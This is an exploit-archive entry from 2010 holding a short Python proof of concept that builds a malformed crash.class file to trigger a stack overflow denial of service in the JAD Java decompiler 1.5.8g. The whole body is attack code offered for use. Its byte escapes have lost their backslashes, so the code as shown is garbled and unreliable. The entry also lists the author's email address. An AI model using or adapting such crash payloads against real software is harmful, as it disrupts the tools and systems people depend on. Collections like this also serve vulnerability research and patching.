[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : JAD java decompiler 1.5.8g (.class) Stack Overflow DoS
# Published : 2010-03-09
# Author : l3D
# Previous Title : TopDownloads MP3 Player 1.0 m3u crash
# Next Title : Google Chrome v4.0.249 XML Denial of Service PoC
#!/usr/bin/env python
#JAD java decompiler 1.5.8g (.class) Stack Overflow DoS
#Tested on Windows
#Software Link: http://www.varaneckas.com/jad
#Author: l3D
#Site: http://xraysecurity.blogspot.com
#IRC: irc://irc.nix.co.il
#Email: pupipup33@gmail.com
header='xcaxfexbaxbex01x04x01x04xffxff'
evil='x07x01x01'*0x100000
bad=open('crash.class', 'w')
bad.write(header+evil)
bad.close()